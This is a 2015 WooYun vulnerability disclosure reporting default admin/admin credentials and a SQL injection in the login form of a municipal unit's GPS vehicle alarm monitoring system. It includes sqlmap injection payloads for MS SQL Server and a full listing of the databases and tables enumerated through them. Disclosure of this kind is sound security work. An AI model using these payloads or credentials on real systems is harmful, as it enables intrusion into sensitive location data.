当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101008

漏洞标题:某市敏感单位车辆报警监控系统SQL注入&弱口令

相关厂商:某市敏感单位

漏洞作者: YY-2012

提交时间:2015-03-13 14:34

修复时间:2015-04-27 14:36

公开时间:2015-04-27 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-27: 细节向公众公开

简要描述:

rt

详细说明:

mask 区域
*****挥中心GPS车^*****
1.http://**.**.**/login.htm


admin/admin
登录框还存在post注入

漏洞证明:

mask 区域
*****60862211c4c36f0e.jpg" al*****
**********
*****804f21d1370528e1.jpg" al*****


sqlmap identified the following injection points with a total of 310 HTTP(s) requests:
---
Parameter: userid (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userid=asd' AND 4457=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4457=4457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rBNt'='rBNt&password=asd&I1.x=14&I1.y=14
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=asd';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: userid=asd' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: userid=asd' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(103)+CHAR(83)+CHAR(69)+CHAR(71)+CHAR(121)+CHAR(121)+CHAR(119)+CHAR(65)+CHAR(75)+CHAR(109)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=asd&I1.x=14&I1.y=14
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userid=asd' AND 4457=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4457=4457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rBNt'='rBNt&password=asd&I1.x=14&I1.y=14
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=asd';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: userid=asd' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=14&I1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: userid=asd' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(103)+CHAR(83)+CHAR(69)+CHAR(71)+CHAR(121)+CHAR(121)+CHAR(119)+CHAR(65)+CHAR(75)+CHAR(109)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=asd&I1.x=14&I1.y=14
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblClassExtension |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: gpslog
[116 tables]
+--------------------------------------------+
| ALARMMSG201005 |
| ALARMMSG201010 |
| ALARMMSG201011 |
| ALARMMSG201012 |
| ALARMMSG201101 |
| ALARMMSG201102 |
| ALARMMSG201103 |
| ALARMMSG201104 |
| ALARMMSG201105 |
| ALARMMSG201106 |
| ALARMMSG201107 |
| ALARMMSG201108 |
| ALARMMSG201109 |
| ALARMMSG201110 |
| ALARMMSG201111 |
| ALARMMSG201112 |
| ALARMMSG201201 |
| ALARMMSG201202 |
| ALARMMSG201203 |
| ALARMMSG201204 |
| ALARMMSG201205 |
| ALARMMSG201206 |
| ALARMMSG201207 |
| ALARMMSG201208 |
| ALARMMSG201209 |
| ALARMMSG201210 |
| ALARMMSG201211 |
| ALARMMSG201212 |
| ALARMMSG201301 |
| ALARMMSG201302 |
| ALARMMSG201303 |
| ALARMMSG201304 |
| ALARMMSG201305 |
| ALARMMSG201306 |
| ALARMMSG201307 |
| ALARMMSG201308 |
| ALARMMSG201309 |
| ALARMMSG201310 |
| ALARMMSG201311 |
| ALARMMSG201312 |
| ALARMMSG201401 |
| ALARMMSG201402 |
| ALARMMSG201403 |
| ALARMMSG201404 |
| ALARMMSG201405 |
| ALARMMSG201406 |
| ALARMMSG201407 |
| ALARMMSG201408 |
| ALARMMSG201409 |
| ALARMMSG201410 |
| ALARMMSG201411 |
| ALARMMSG201412 |
| ALARMMSG201501 |
| ALARMMSG201502 |
| ALARMMSG201503 |
| ALARMMSG201504 |
| HISTORYINFO201005 |
| HISTORYINFO201010 |
| HISTORYINFO201011 |
| HISTORYINFO201012 |
| HISTORYINFO201101 |
| HISTORYINFO201102 |
| HISTORYINFO201103 |
| HISTORYINFO201104 |
| HISTORYINFO201105 |
| HISTORYINFO201106 |
| HISTORYINFO201107 |
| HISTORYINFO201108 |
| HISTORYINFO201109 |
| HISTORYINFO201110 |
| HISTORYINFO201111 |
| HISTORYINFO201112 |
| HISTORYINFO201201 |
| HISTORYINFO201202 |
| HISTORYINFO201203 |
| HISTORYINFO201204 |
| HISTORYINFO201205 |
| HISTORYINFO201206 |
| HISTORYINFO201207 |
| HISTORYINFO201208 |
| HISTORYINFO201209 |
| HISTORYINFO201210 |
| HISTORYINFO201211 |
| HISTORYINFO201212 |
| HISTORYINFO201301 |
| HISTORYINFO201302 |
| HISTORYINFO201303 |
| HISTORYINFO201304 |
| HISTORYINFO201305 |
| HISTORYINFO201306 |
| HISTORYINFO201307 |
| HISTORYINFO201308 |
| HISTORYINFO201309 |
| HISTORYINFO201310 |
| HISTORYINFO201311 |
| HISTORYINFO201312 |
| HISTORYINFO201401 |
| HISTORYINFO201402 |
| HISTORYINFO201403 |
| HISTORYINFO201404 |
| HISTORYINFO201405 |
| HISTORYINFO201406 |
| HISTORYINFO201407 |
| HISTORYINFO201408 |
| HISTORYINFO201409 |
| HISTORYINFO201410 |
| HISTORYINFO201411 |
| HISTORYINFO201412 |
| HISTORYINFO201501 |
| HISTORYINFO201502 |
| HISTORYINFO201503 |
| HISTORYINFO201504 |
| dtproperties |
| mt_info |
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+

修复方案:

修改密码,过滤相关字符

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-13 15:25

厂商回复:

验证确认存在所描述的问题,已通知其修改。

最新状态:

暂无